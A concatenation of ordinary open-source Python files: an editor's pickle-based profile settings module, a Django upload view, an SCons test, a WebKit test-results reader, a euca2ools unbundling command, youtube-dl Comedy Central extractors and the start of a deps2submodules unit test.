"""Gets the specified item from the data set
@param index: index of item to get
@keyword fmt: format the item should be in
@keyword default: Default value to return if index is
not in profile.
"""
if index in self:
val = self.__getitem__(index)
else:
return default
if fmt is None:
return val
else:
return _ToObject(index, val, fmt)
def Load(self, path):
"""Load the profiles data set with data from the given file
@param path: path to file to load data from
@note: The files data must have been written with a pickler
"""
if os.path.exists(path):
try:
fhandle = open(path, 'rb')
val = cPickle.load(fhandle)
fhandle.close()
except (IOError, SystemError, OSError,
cPickle.UnpicklingError, EOFError), msg:
dev_tool.DEBUGP("[profile][err] %s" % str(msg))
else:
if isinstance(val, dict):
self.update(val)
self.Set('MYPROFILE', path)
dev_tool.DEBUGP("[profile][info] Loaded %s" % path)
else:
dev_tool.DEBUGP("[profile][err] %s does not exist" % path)
dev_tool.DEBUGP("[profile][info] Loading defaults")
self.LoadDefaults()
self.Set('MYPROFILE', path)
return False
# Update profile to any keys that are missing
for key in _DEFAULTS:
if key not in self:
self.Set(key, _DEFAULTS[key])
return True
def LoadDefaults(self):
"""Loads the default values into the profile
@return: None
"""
self.clear()
self.update(_DEFAULTS)
def Set(self, index, val, fmt=None):
"""Set the value of the given index
@param index: Index to set
@param val: Value to set
@keyword fmt: Format to convert to string from
"""
if fmt is None:
self.__setitem__(index, val)
else:
self.__setitem__(index, _FromObject(val, fmt))
# Notify all clients with the configuration change message
ed_msg.PostMessage(ed_msg.EDMSG_PROFILE_CHANGE + (index,), val)
def Write(self, path):
"""Write the dataset of this profile as a pickle
@param path: path to where to write the pickle
@return: True on success / False on failure
"""
try:
# Only write if given an absolute path
if not os.path.isabs(path):
return False
self.Set('MYPROFILE', path)
fhandle = open(path, 'wb')
cPickle.dump(self.copy(), fhandle, cPickle.HIGHEST_PROTOCOL)
fhandle.close()
UpdateProfileLoader()
except (IOError, cPickle.PickleError), msg:
dev_tool.DEBUGP(u"[profile][err] %s" % msg)
return False
else:
return True
def Update(self, update=None):
"""Update the profile using data from provided dictionary
or the default set if none is given.
@keyword update: dictionary of values to update from or None
@postcondition: All profile values from the update set are set
in this profile. If update is None then the current
set is only updated to include values from the
DEFAULTS that are not currently present.
"""
if update is None:
for key, val in _DEFAULTS.iteritems():
if key not in self:
self.Set(key, val)
else:
self.update(update)
#---- End Public Members ----#
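The defaults-merge performed by `Update` (and the key backfill at the end of `Load`) boils down to filling in only the keys the user has never customized:

```python
# Hypothetical defaults table; the user-set TABWIDTH must survive the merge.
defaults = {'TABWIDTH': 8, 'USETABS': False}
profile = {'TABWIDTH': 4}

for key, val in defaults.items():
    profile.setdefault(key, val)  # only adds keys that are missing
```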
#-----------------------------------------------------------------------------#
# Singleton reference instance
TheProfile = Profile()
#-----------------------------------------------------------------------------#
# Profile convenience functions
def Profile_Del(item):
"""Removes an item from the profile
@param item: items key name
"""
TheProfile.DeleteItem(item)
def Profile_Get(index, fmt=None, default=None):
"""Convenience for Profile().Get()
@param index: profile index to retrieve
@keyword fmt: format to get value as
@keyword default: default value to return if not found
"""
return TheProfile.Get(index, fmt, default)
def Profile_Set(index, val, fmt=None):
"""Convenience for Profile().Set()
@param index: profile index to set
@param val: value to set index to
@keyword fmt: format to convert object from
"""
return TheProfile.Set(index, val, fmt)
def _FromObject(val, fmt):
"""Convert the given value to a to a profile compatible value
@param val: value to convert
@param fmt: Format to convert to
@type fmt: string
"""
if fmt == u'font' and isinstance(val, wx.Font):
return "%s,%s" % (val.GetFaceName(), val.GetPointSize())
else:
return val
def _ToObject(index, val, fmt):
"""Convert the given value to a different object
@param index: fallback to retrieve item from defaults
@param val: value to convert
@param fmt: Format to convert to
@type fmt: string
@todo: exception handling,
"""
tmp = fmt.lower()
if tmp == u'font':
fnt = val.split(',')
rval = wx.FFont(int(fnt[1]), wx.DEFAULT, face=fnt[0])
elif tmp == u'bool':
if isinstance(val, bool):
rval = val
else:
rval = _DEFAULTS.get(index, False)
elif tmp == u'size_tuple':
if len(val) == 2 and \
isinstance(val[0], int) and isinstance(val[1], int):
rval = val
else:
rval = _DEFAULTS.get(index, wx.DefaultSize)
elif tmp == u'str':
rval = unicode(val)
elif tmp == u'int':
if isinstance(val, int):
rval = val
elif isinstance(val, basestring) and val.isdigit():
rval = int(val)
else:
rval = _DEFAULTS.get(index)
else:
return val
return rval
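The `u'int'` branch of `_ToObject` coerces stored strings back to integers and falls back to the defaults table when the value is unusable. A wx-free sketch of that branch — `str` stands in for Python 2's `basestring`, and the defaults table here is hypothetical:

```python
_DEFAULTS = {'TABWIDTH': 8}

def to_int(index, val):
    # Mirrors the u'int' branch of _ToObject above (wx-free sketch).
    if isinstance(val, int):
        return val
    if isinstance(val, str) and val.isdigit():
        return int(val)
    return _DEFAULTS.get(index)  # unusable value: fall back to the default
```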
#---- Begin Function Definitions ----#
def AddFileHistoryToProfile(file_history):
"""Manages work of adding a file from the profile in order
to allow the top files from the history to be available
the next time the user opens the program.
@param file_history: add saved files to history list
"""
files = list()
for fnum in xrange(file_history.GetNoHistoryFiles()):
files.append(file_history.GetHistoryFile(fnum))
Profile_Set('FHIST', files)
def CalcVersionValue(ver_str="0.0.0"):
"""Calculates a version value from the provided dot-formated string
1) SPECIFICATION: Version value calculation AA.BBB.CCC
- major values: < 1 (i.e 0.0.85 = 0.850)
- minor values: 1 - 999 (i.e 0.1.85 = 1.850)
- micro values: >= 1000 (i.e 1.1.85 = 1001.850)
@keyword ver_str: Version string to calculate value of
"""
ver_str = ''.join([char for char in ver_str
if char.isdigit() or char == '.'])
ver_lvl = ver_str.split(u".")
if len(ver_lvl) < 3:
return 0
major = int(ver_lvl[0]) * 1000
minor = int(ver_lvl[1])
if len(ver_lvl[2]) <= 2:
ver_lvl[2] += u'0'
micro = float(ver_lvl[2]) / 1000
return float(major) + float(minor) + micro
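A standalone copy of the function reproduces the worked examples from the docstring above (major scaled by 1000, two-digit micro values padded before dividing):

```python
def calc_version_value(ver_str="0.0.0"):
    # Standalone copy of CalcVersionValue above.
    ver_str = ''.join([c for c in ver_str if c.isdigit() or c == '.'])
    ver_lvl = ver_str.split(".")
    if len(ver_lvl) < 3:
        return 0
    major = int(ver_lvl[0]) * 1000
    minor = int(ver_lvl[1])
    if len(ver_lvl[2]) <= 2:
        ver_lvl[2] += '0'  # pad so '85' and '850' compare equally
    micro = float(ver_lvl[2]) / 1000
    return float(major) + float(minor) + micro
```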
def GetLoader():
"""Finds the loader to use
@return: path to profile loader
@note: path may not exist, only returns the path to where the loader
should be.
"""
cbase = CONFIG['CONFIG_BASE']
if cbase is None:
cbase = wx.StandardPaths_Get().GetUserDataDir()
loader = os.path.join(cbase, u"profiles", u".loader2")
return loader
def GetProfileStr():
"""Reads the profile string from the loader and returns it.
The profile string must be the first line in the loader file.
@return: path of profile used in last session
"""
reader = util.GetFileReader(GetLoader())
if reader == -1:
# So return the default
return CONFIG['PROFILE_DIR'] + u"default.ppb"
profile = reader.readline()
profile = profile.split("\n")[0] # strip newline from end
reader.close()
return profile
def ProfileIsCurrent():
"""Checks if profile is compatible with current editor version
and returns a bool stating if it is or not.
@return: whether profile on disk was written with current program version
"""
if CalcVersionValue(ProfileVersionStr()) >= CalcVersionValue(VERSION):
return True
else:
return False
def ProfileVersionStr():
"""Checks the Loader for the profile version string and
returns the version string. If there is an error or the
string is not found it returns a zero version string.
@return: the version string value from the profile loader file
"""
loader = GetLoader()
reader = util.GetFileReader(loader, sys.getfilesystemencoding())
if reader == -1:
return "0.0.0"
ret_val = "0.0.0"
count = 0
while True:
count += 1
value = reader.readline()
value = value.split()
if len(value) > 0:
if value[0] == u'VERSION':
ret_val = value[1]
break
# Give up after 20 lines if version string not found
if count > 20:
break
reader.close()
return ret_val
def UpdateProfileLoader():
"""Updates Loader File
@precondition: MYPROFILE has been set
@postcondition: on disk profile loader is updated
@return: 0 if no error, non zero for error condition
"""
writer = util.GetFileWriter(GetLoader())
if writer == -1:
return 1
prof_name = Profile_Get('MYPROFILE')
if not prof_name or not os.path.isabs(prof_name):
prof_name = CONFIG['PROFILE_DIR'] + 'default.ppb'
if not os.path.exists(prof_name):
prof_name = os.path.join(CONFIG['CONFIG_DIR'],
os.path.basename(prof_name))
Profile_Set('MYPROFILE', prof_name)
# Use just the relative profile name for local(portable) config paths
if CONFIG['ISLOCAL']:
prof_name = os.path.basename(prof_name)
writer.write(prof_name)
writer.write(u"\nVERSION\t" + VERSION)
writer.close()
return 0
| gpl-3.0 |
vstoykov/django-sticky-uploads | stickyuploads/views.py | 1 | 1588 | from __future__ import unicode_literals
import json
from django.core.files.storage import get_storage_class
from django.http import HttpResponse, HttpResponseForbidden
from django.views.generic import View
from .forms import UploadForm
class UploadView(View):
"""Base view class for accepting file uploads."""
form_class = UploadForm
storage_class = 'stickyuploads.storage.TempFileSystemStorage'
def post(self, *args, **kwargs):
"""Save file and return saved info or report errors."""
if self.upload_allowed():
form = self.get_upload_form()
result = {}
if form.is_valid():
storage = self.get_storage()
result['is_valid'] = True
info = form.stash(storage, self.request.path)
result.update(info)
else:
result.update({
'is_valid': False,
'errors': form.errors,
})
return HttpResponse(json.dumps(result), content_type='application/json')
else:
return HttpResponseForbidden()
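The JSON payload assembled in `post()` has the shape sketched below. This is a Django-free illustration of the response assembly only; any field beyond `is_valid`/`errors` depends on what `form.stash()` actually returns, so `stored_name` here is a made-up example:

```python
import json

def build_upload_result(is_valid, info=None, errors=None):
    # Mirrors the response assembly in UploadView.post above.
    result = {'is_valid': is_valid}
    if is_valid:
        result.update(info or {})    # merge in the stash info on success
    else:
        result['errors'] = errors or {}
    return json.dumps(result)
```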
def get_storage(self):
"""Get storage instance for saving the temporary upload."""
return get_storage_class(self.storage_class)()
def upload_allowed(self):
"""Check if the current request is allowed to upload files."""
return self.request.user.is_authenticated()
def get_upload_form(self):
"""Construct form for accepting file upload."""
return self.form_class(self.request.POST, self.request.FILES)
| bsd-3-clause |
timj/scons | test/option--C.py | 1 | 3439 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os
import TestSCons
def match_normcase(lines, matches):
if not isinstance(lines, list):
lines = lines.split("\n")
if not isinstance(matches, list):
matches = matches.split("\n")
if len(lines) != len(matches):
return
for i in range(len(lines)):
if os.path.normcase(lines[i]) != os.path.normcase(matches[i]):
return
return 1
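The custom matcher above normalizes path case line-by-line with `os.path.normcase`, so expected output containing paths compares equal on case-insensitive filesystems (it returns `1` on a full match and `None` otherwise). Exercised standalone with platform-independent inputs:

```python
import os

def match_normcase(lines, matches):
    # Same logic as the test helper above: split strings into lines,
    # then compare each pair with case normalized for the platform.
    if not isinstance(lines, list):
        lines = lines.split("\n")
    if not isinstance(matches, list):
        matches = matches.split("\n")
    if len(lines) != len(matches):
        return
    for i in range(len(lines)):
        if os.path.normcase(lines[i]) != os.path.normcase(matches[i]):
            return
    return 1
```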
test = TestSCons.TestSCons(match=match_normcase)
wpath = test.workpath()
wpath_sub = test.workpath('sub')
wpath_sub_dir = test.workpath('sub', 'dir')
wpath_sub_foo_bar = test.workpath('sub', 'foo', 'bar')
test.subdir('sub', ['sub', 'dir'])
test.write('SConstruct', """
import os
print("SConstruct", os.getcwd())
""")
test.write(['sub', 'SConstruct'], """
import os
print(GetBuildPath('..'))
""")
test.write(['sub', 'dir', 'SConstruct'], """
import os
env = Environment(FOO='foo', BAR='bar')
print(env.GetBuildPath('../$FOO/$BAR'))
""")
test.run(arguments = '-C sub .',
stdout = "scons: Entering directory `%s'\n" % wpath_sub \
+ test.wrap_stdout(read_str = '%s\n' % wpath,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = '-C sub -C dir .',
stdout = "scons: Entering directory `%s'\n" % wpath_sub_dir \
+ test.wrap_stdout(read_str = '%s\n' % wpath_sub_foo_bar,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = ".",
stdout = test.wrap_stdout(read_str = 'SConstruct %s\n' % wpath,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = '--directory=sub/dir .',
stdout = "scons: Entering directory `%s'\n" % wpath_sub_dir \
+ test.wrap_stdout(read_str = '%s\n' % wpath_sub_foo_bar,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = '-C %s -C %s .' % (wpath_sub_dir, wpath_sub),
stdout = "scons: Entering directory `%s'\n" % wpath_sub \
+ test.wrap_stdout(read_str = '%s\n' % wpath,
build_str = "scons: `.' is up to date.\n"))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit |
thomasrogers03/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/layouttestresultsreader.py | 124 | 4953 | # Copyright (c) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
from webkitpy.common.net.layouttestresults import LayoutTestResults
from webkitpy.common.net.unittestresults import UnitTestResults
from webkitpy.tool.steps.runtests import RunTests
_log = logging.getLogger(__name__)
# FIXME: This class no longer has a clear purpose, and should probably
# be made part of Port, or renamed to something more fitting such as LayoutTestResultsArchiver.
class LayoutTestResultsReader(object):
def __init__(self, host, results_directory, archive_directory):
self._host = host
self._results_directory = results_directory
self._archive_directory = archive_directory
# FIXME: This exists for mocking, but should instead be mocked via
# host.filesystem.read_text_file. They have different error handling at the moment.
def _read_file_contents(self, path):
try:
return self._host.filesystem.read_text_file(path)
except IOError: # File does not exist or can't be read.
return None
# FIXME: This logic should move to the port object.
def _create_layout_test_results(self):
results_path = self._host.filesystem.join(self._results_directory, "full_results.json")
results_json = self._read_file_contents(results_path)
if not results_json:
return None
return LayoutTestResults.results_from_string(results_json)
def _create_unit_test_results(self):
results_path = self._host.filesystem.join(self._results_directory, "webkit_unit_tests_output.xml")
results_xml = self._read_file_contents(results_path)
if not results_xml:
return None
return UnitTestResults.results_from_string(results_xml)
def results(self):
layout_test_results = self._create_layout_test_results()
unit_test_results = self._create_unit_test_results()
if layout_test_results:
# FIXME: This is used to detect if we had N failures due to
# N tests failing, or if we hit the "exit-after-n-failures" limit.
# These days we could just check for the "interrupted" key in results.json instead!
layout_test_results.set_failure_limit_count(RunTests.NON_INTERACTIVE_FAILURE_LIMIT_COUNT)
if unit_test_results:
layout_test_results.add_unit_test_failures(unit_test_results)
return layout_test_results
def archive(self, patch):
filesystem = self._host.filesystem
workspace = self._host.workspace
results_directory = self._results_directory
results_name, _ = filesystem.splitext(filesystem.basename(results_directory))
# Note: We name the zip with the bug_id instead of patch_id to match work_item_log_path().
zip_path = workspace.find_unused_filename(self._archive_directory, "%s-%s" % (patch.bug_id(), results_name), "zip")
if not zip_path:
return None
if not filesystem.isdir(results_directory):
_log.info("%s does not exist, not archiving." % results_directory)
return None
archive = workspace.create_zip(filesystem.abspath(zip_path), filesystem.abspath(results_directory))
# Remove the results directory to prevent http logs, etc. from getting huge between runs.
# We could have create_zip remove the original, but this is more explicit.
filesystem.rmtree(results_directory)
return archive
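The `_read_file_contents` helper above deliberately turns a missing or unreadable results file into `None`, which `_create_layout_test_results` and `_create_unit_test_results` then treat as "no results". A minimal standalone sketch of that convention (the `FakeFilesystem` class here is a hypothetical stand-in for `host.filesystem`, not part of webkitpy):

```python
class FakeFilesystem(object):
    """Hypothetical stand-in for host.filesystem in the reader above."""
    def __init__(self, files):
        self._files = files  # maps path -> file contents

    def read_text_file(self, path):
        if path not in self._files:
            raise IOError('No such file: %s' % path)
        return self._files[path]


def read_file_or_none(filesystem, path):
    # Mirrors _read_file_contents: a missing/unreadable file becomes None.
    try:
        return filesystem.read_text_file(path)
    except IOError:
        return None
```

With this shape, callers can short-circuit on a simple truthiness check instead of wrapping every read in a try/except.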
| bsd-3-clause |
jhajek/euca2ools | euca2ools/commands/bundle/downloadandunbundle.py | 3 | 6029 | # Copyright 2009-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os.path
import sys
from requestbuilder import Arg
from requestbuilder.exceptions import ArgumentError
from requestbuilder.mixins import FileTransferProgressBarMixin
from euca2ools.bundle.util import open_pipe_fileobjs
from euca2ools.bundle.util import waitpid_in_thread
from euca2ools.commands.bundle.downloadbundle import DownloadBundle
from euca2ools.commands.bundle.mixins import BundleDownloadingMixin
from euca2ools.commands.bundle.unbundlestream import UnbundleStream
from euca2ools.commands.s3 import S3Request
class DownloadAndUnbundle(S3Request, FileTransferProgressBarMixin,
BundleDownloadingMixin):
DESCRIPTION = ('Download and unbundle a bundled image from the cloud\n\n '
'The key used to unbundle the image must match a '
'certificate that was used to bundle it.')
ARGS = [Arg('-d', '--destination', dest='dest', metavar='(FILE | DIR)',
default=".", help='''where to place the unbundled image
(default: current directory)'''),
Arg('-k', '--privatekey',
help='''file containing the private key to decrypt the bundle
with. This must match a certificate used when bundling the
image.''')]
# noinspection PyExceptionInherit
def configure(self):
S3Request.configure(self)
# The private key could be the user's or the cloud's. In the config
# this is a user-level option.
if not self.args.get('privatekey'):
config_privatekey = self.config.get_user_option('private-key')
if self.args.get('userregion'):
self.args['privatekey'] = config_privatekey
elif 'EC2_PRIVATE_KEY' in os.environ:
self.args['privatekey'] = os.getenv('EC2_PRIVATE_KEY')
elif config_privatekey:
self.args['privatekey'] = config_privatekey
else:
raise ArgumentError(
'missing private key; please supply one with -k')
self.args['privatekey'] = os.path.expanduser(os.path.expandvars(
self.args['privatekey']))
if not os.path.exists(self.args['privatekey']):
raise ArgumentError("private key file '{0}' does not exist"
.format(self.args['privatekey']))
if not os.path.isfile(self.args['privatekey']):
raise ArgumentError("private key file '{0}' is not a file"
.format(self.args['privatekey']))
self.log.debug('private key: %s', self.args['privatekey'])
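The private-key lookup in `configure()` walks a fixed precedence chain: an explicit `-k` argument wins, then (when a userregion is in play) the user-level config option, then `EC2_PRIVATE_KEY` from the environment, then the config option again as a fallback. A simplified sketch of that chain — the function name and plain-dict arguments are illustrative, not part of euca2ools:

```python
def resolve_private_key(arg_key, userregion, config_key, environ):
    # Precedence mirrors DownloadAndUnbundle.configure():
    # explicit argument > config (when a userregion is forced) >
    # EC2_PRIVATE_KEY > config > error.
    if arg_key:
        return arg_key
    if userregion and config_key:
        return config_key
    if environ.get('EC2_PRIVATE_KEY'):
        return environ['EC2_PRIVATE_KEY']
    if config_key:
        return config_key
    raise ValueError('missing private key; please supply one with -k')
```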
def __open_dest(self, manifest):
if self.args['dest'] == '-':
self.args['dest'] = sys.stdout
self.args['show_progress'] = False
elif isinstance(self.args['dest'], basestring):
if os.path.isdir(self.args['dest']):
image_filename = os.path.join(self.args['dest'],
manifest.image_name)
else:
image_filename = self.args['dest']
self.args['dest'] = open(image_filename, 'w')
return image_filename
# Otherwise we assume it's a file object
def main(self):
manifest = self.fetch_manifest(
self.service, privkey_filename=self.args['privatekey'])
download_out_r, download_out_w = open_pipe_fileobjs()
try:
self.__create_download_pipeline(download_out_w)
finally:
download_out_w.close()
image_filename = self.__open_dest(manifest)
unbundlestream = UnbundleStream.from_other(
self, source=download_out_r, dest=self.args['dest'],
enc_key=manifest.enc_key, enc_iv=manifest.enc_iv,
image_size=manifest.image_size, sha1_digest=manifest.image_digest,
show_progress=self.args.get('show_progress', False))
unbundlestream.main()
return image_filename
def __create_download_pipeline(self, outfile):
downloadbundle = DownloadBundle.from_other(
self, dest=outfile, bucket=self.args['bucket'],
manifest=self.args.get('manifest'),
local_manifest=self.args.get('local_manifest'),
show_progress=False)
downloadbundle_p = multiprocessing.Process(target=downloadbundle.main)
downloadbundle_p.start()
waitpid_in_thread(downloadbundle_p.pid)
outfile.close()
def print_result(self, image_filename):
if (image_filename and
self.args['dest'].fileno() != sys.stdout.fileno()):
print 'Wrote', image_filename
| bsd-2-clause |
adazey/Muzez | libs/youtube_dl/extractor/comedycentral.py | 3 | 5881 | from __future__ import unicode_literals
from .mtv import MTVServicesInfoExtractor
from .common import InfoExtractor
class ComedyCentralIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(video-clips|episodes|cc-studios|video-collections|shows(?=/[^/]+/(?!full-episodes)))
/(?P<title>.*)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TESTS = [{
'url': 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother',
'md5': 'c4f48e9eda1b16dd10add0744344b6d8',
'info_dict': {
'id': 'cef0cbb3-e776-4bc9-b62e-8016deccb354',
'ext': 'mp4',
'title': 'CC:Stand-Up|August 18, 2013|1|0101|Uncensored - Too Good of a Mother',
'description': 'After a certain point, breastfeeding becomes c**kblocking.',
'timestamp': 1376798400,
'upload_date': '20130818',
},
}, {
'url': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/interviews/6yx39d/exclusive-rand-paul-extended-interview',
'only_matching': True,
}]
class ComedyCentralFullEpisodesIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(?:full-episodes|shows(?=/[^/]+/full-episodes))
/(?P<id>[^?]+)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TESTS = [{
'url': 'http://www.cc.com/full-episodes/pv391a/the-daily-show-with-trevor-noah-november-28--2016---ryan-speedo-green-season-22-ep-22028',
'info_dict': {
'description': 'Donald Trump is accused of exploiting his president-elect status for personal gain, Cuban leader Fidel Castro dies, and Ryan Speedo Green discusses "Sing for Your Life."',
'title': 'November 28, 2016 - Ryan Speedo Green',
},
'playlist_count': 4,
}, {
'url': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/full-episodes',
'only_matching': True,
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
feed_json = self._search_regex(r'var triforceManifestFeed\s*=\s*(\{.+?\});\n', webpage, 'triforce feed')
feed = self._parse_json(feed_json, playlist_id)
zones = feed['manifest']['zones']
video_zone = zones['t2_lc_promo1']
feed = self._download_json(video_zone['feed'], playlist_id)
mgid = feed['result']['data']['id']
videos_info = self._get_videos_info(mgid)
return videos_info
class ToshIE(MTVServicesInfoExtractor):
IE_DESC = 'Tosh.0'
_VALID_URL = r'^https?://tosh\.cc\.com/video-(?:clips|collections)/[^/]+/(?P<videotitle>[^/?#]+)'
_FEED_URL = 'http://tosh.cc.com/feeds/mrss'
_TESTS = [{
'url': 'http://tosh.cc.com/video-clips/68g93d/twitter-users-share-summer-plans',
'info_dict': {
'description': 'Tosh asked fans to share their summer plans.',
'title': 'Twitter Users Share Summer Plans',
},
'playlist': [{
'md5': 'f269e88114c1805bb6d7653fecea9e06',
'info_dict': {
'id': '90498ec2-ed00-11e0-aca6-0026b9414f30',
'ext': 'mp4',
'title': 'Tosh.0|June 9, 2077|2|211|Twitter Users Share Summer Plans',
'description': 'Tosh asked fans to share their summer plans.',
'thumbnail': 're:^https?://.*\.jpg',
# It really is reported to be published in the year 2077
'upload_date': '20770610',
'timestamp': 3390510600,
'subtitles': {
'en': 'mincount:3',
},
},
}]
}, {
'url': 'http://tosh.cc.com/video-collections/x2iz7k/just-plain-foul/m5q4fp',
'only_matching': True,
}]
@classmethod
def _transform_rtmp_url(cls, rtmp_video_url):
new_urls = super(ToshIE, cls)._transform_rtmp_url(rtmp_video_url)
new_urls['rtmp'] = rtmp_video_url.replace('viacomccstrm', 'viacommtvstrm')
return new_urls
class ComedyCentralTVIE(MTVServicesInfoExtractor):
_VALID_URL = r'https?://(?:www\.)?comedycentral\.tv/(?:staffeln|shows)/(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'http://www.comedycentral.tv/staffeln/7436-the-mindy-project-staffel-4',
'info_dict': {
'id': 'local_playlist-f99b626bdfe13568579a',
'ext': 'flv',
'title': 'Episode_the-mindy-project_shows_season-4_episode-3_full-episode_part1',
},
'params': {
# rtmp download
'skip_download': True,
},
}, {
'url': 'http://www.comedycentral.tv/shows/1074-workaholics',
'only_matching': True,
}, {
'url': 'http://www.comedycentral.tv/shows/1727-the-mindy-project/bonus',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
mrss_url = self._search_regex(
r'data-mrss=(["\'])(?P<url>(?:(?!\1).)+)\1',
webpage, 'mrss url', group='url')
return self._get_videos_info_from_url(mrss_url, video_id)
class ComedyCentralShortnameIE(InfoExtractor):
_VALID_URL = r'^:(?P<id>tds|thedailyshow)$'
_TESTS = [{
'url': ':tds',
'only_matching': True,
}, {
'url': ':thedailyshow',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
shortcut_map = {
'tds': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/full-episodes',
'thedailyshow': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/full-episodes',
}
return self.url_result(shortcut_map[video_id])
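The shortname extractor above relies on `_VALID_URL` matching the whole pseudo-URL and exposing the shortcut through the named `id` group. A quick sketch of how that regex behaves (`match_shortname` is an illustrative helper, not part of youtube-dl):

```python
import re

# Same pattern as ComedyCentralShortnameIE._VALID_URL above.
SHORTNAME_RE = r'^:(?P<id>tds|thedailyshow)$'

def match_shortname(url):
    # Returns the captured shortcut id, or None when the URL is not a shortname.
    m = re.match(SHORTNAME_RE, url)
    return m.group('id') if m else None
```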
| gpl-3.0 |
espadrine/opera | chromium/src/tools/deps2git/deps2submodules_unittest.py | 10 | 2847 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import deps2submodules
class Deps2SubmodulesCollateDepsTest(unittest.TestCase):
def testBasic(self):
arg = ({
'src/monkeypatch': 'http://git.chromium.org/monkepatch.git@abc123',
'src/third_party/monkeyfood':
'http://git.chromium.org/monkeyfood@def456',
}, {}) # No OS-specific DEPS.
expected = {
'monkeypatch':
[['all'], 'http://git.chromium.org/monkepatch.git', 'abc123'],
'third_party/monkeyfood':
[['all'], 'http://git.chromium.org/monkeyfood', 'def456'],
}
